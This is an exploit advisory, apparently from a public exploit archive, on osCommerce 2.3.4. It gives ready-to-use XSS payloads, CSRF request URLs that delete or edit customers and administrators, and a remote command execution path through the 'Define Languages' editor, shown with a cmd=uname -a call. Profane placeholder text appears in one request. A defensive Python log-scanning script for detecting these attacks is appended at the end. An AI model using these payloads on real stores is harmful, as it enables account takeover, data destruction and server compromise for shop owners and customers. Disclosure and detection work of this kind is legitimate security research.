#Title: osCommerce 2.3.4 - Multiple vulnerabilities
#Date: 10.07.14
#Affected versions: => 2.3.4 (latest atm)
#Vendor: oscommerce.com
#Tested on: Apache 2.2.22 [at] Debian
#Contact: smash [at] devilteam.pl
#Cross Site Scripting
1. Reflected XSS -> Send Email
Vulnerable parameters - customers_email_address & mail_sent_to
a) POST
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
Host: localhost
customers_email_address=&from=fuck@shit.up&subject=test&message=test
Response:
HTTP/1.1 200 OK
(...)
Customer:
(...)
CSRF PoC:
b) GET
Request:
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
Host: localhost
Response:
(...)
&nbsp;Notice: Email sent to:
(...)
2. Persistent XSS via CSRF -> Newsletter
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: localhost
module=newsletter&title=&content=
CSRF PoC:
The first popup (123) fires whenever someone visits the newsletters page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php
(...)
&nbsp;
(...)
The second one fires whenever someone visits the specific newsletter page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview
(...)
3. Persistent XSS via CSRF -> Banner manager
Vulnerable parameter - banners_title
PoC:
JS is executed whenever someone visits the banner manager page or a specific banner page.
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]
Response:
&nbsp; | group
4. Persistent XSS via CSRF -> Locations / Taxes
Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
PoC:
JS is executed whenever someone visits the 'Countries' tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php
Response:
(...)
AAAA | xs | sed
(...)
5. Persistent XSS via CSRF -> Localization
a) Currencies
PoC:
JS is executed whenever someone visits the currencies tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php
Response:
(...)
(default) | 666 | 666.00000000
(...)
b) Languages
PoC:
JS is executed whenever someone visits the languages tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php
Response:
(...)
66
(...)
c) Orders status
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost
orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS
Response:
(...)
'>"><>XSS
(...)
'>"><>XSS
(...)
&nbsp;'>"><>XSS
" title="">" />&nbsp;'>"><>XSS
<>XSS/images/icon.gif'>"><>XSS" border="0" alt="">" title="">" />&nbsp;'>"><>XSS
<>XSS" border="0" alt="">" title="">" />&nbsp;'>"><>XSS
" title="">" />&nbsp;'>"><>XSS
<>XSS" border="0" alt="">" title="">" />&nbsp;'>"><>XSS
&nbsp;'>"><>XSS
#Boring CSRF
- Remove any item from cart
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product
- Add item to cart
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product
- Remove address book entry
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1
- Remove specific country
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm
- Remove specific currency
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm
- Change store credentials
I'm too bored to craft more requests; the whole 'Configuration' & 'Catalog' panel suffers from CSRF.
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php
...and a lot more.
#Less boring CSRF
- Send email as admin -> Send email
Email can be sent to a specific user, to newsletter subscribers, or to all customers. In this case, '***' stands for sending mail to all customers.
- Delete / Edit specific user
Remove user PoC:
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
Edit user PoC:
- Add / Edit / Delete admin
Add admin account:
Change admin (set new password):
Remove admin:
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm
- RCE via CSRF -> Define Languages
The 'Define Languages' tab allows changing the content of a specific file. The default English language, and therefore the default file path, is used here. The file MUST be writable. The value is the default content of english.php; as you can notice, a passthru function is included in it.
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
PoC:
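Added detection example, not part of the advisory or of osCommerce: a Python triage script run over constructed Apache combined-format log lines that mirror the request shapes above. It flags query strings carrying the payload shapes from the XSS sections and state-changing admin actions (action=deleteconfirm, action=insert) whose Referer is missing or off-site, which is what the GET-based CSRF lures listed above produce. The log lines and the store hostname `localhost` are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache "combined" log lines modelled on the advisory's URLs (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2014:12:00:01 +0200] "GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1" 200 5120 "http://evil.example/lure.html" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2014:12:00:02 +0200] "GET /osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm HTTP/1.1" 302 0 "http://evil.example/lure.html" "Mozilla/5.0"
10.0.0.7 - - [10/Jul/2014:12:01:00 +0200] "GET /osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm HTTP/1.1" 302 0 "http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php" "Mozilla/5.0"
10.0.0.9 - - [10/Jul/2014:12:02:00 +0200] "GET /osc/oscommerce-2.3.4/catalog/index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Admin action values the advisory shows changing state via plain GET; extend for your store.
STATE_CHANGING_ACTIONS = {"deleteconfirm", "insert"}
# Cheap markers for the reflected/persistent payload shapes shown in the advisory.
XSS_MARKERS = ("<script", "onerror=", "javascript:", "'>\"><")


def classify(line, own_host="localhost"):
    """Return finding tags for one combined-format log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    parts = urlsplit(m.group("url"))
    query = unquote(parts.query).lower()  # decode %3C... so <script> becomes visible
    if any(marker in query for marker in XSS_MARKERS):
        findings.append("xss_payload")
    action = parse_qs(parts.query).get("action", [""])[0]
    if "/admin/" in parts.path and action in STATE_CHANGING_ACTIONS:
        # A state-changing admin hit whose Referer is missing or off-site is the
        # shape a CSRF lure page produces; a missing Referer alone is a weak signal.
        if urlsplit(m.group("referer")).hostname != own_host:
            findings.append("admin_action_offsite_referer")
    return findings


def scan(log_text, own_host="localhost"):
    """Return (ip, url, findings) for each line that triggers at least one finding."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line, own_host)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("url"), findings))
    return hits
```

Pair the Referer check with the real fix (per-session CSRF tokens on every admin action and htmlspecialchars() on every echoed parameter); the log scan only tells you whether the lures above have already been used against the store.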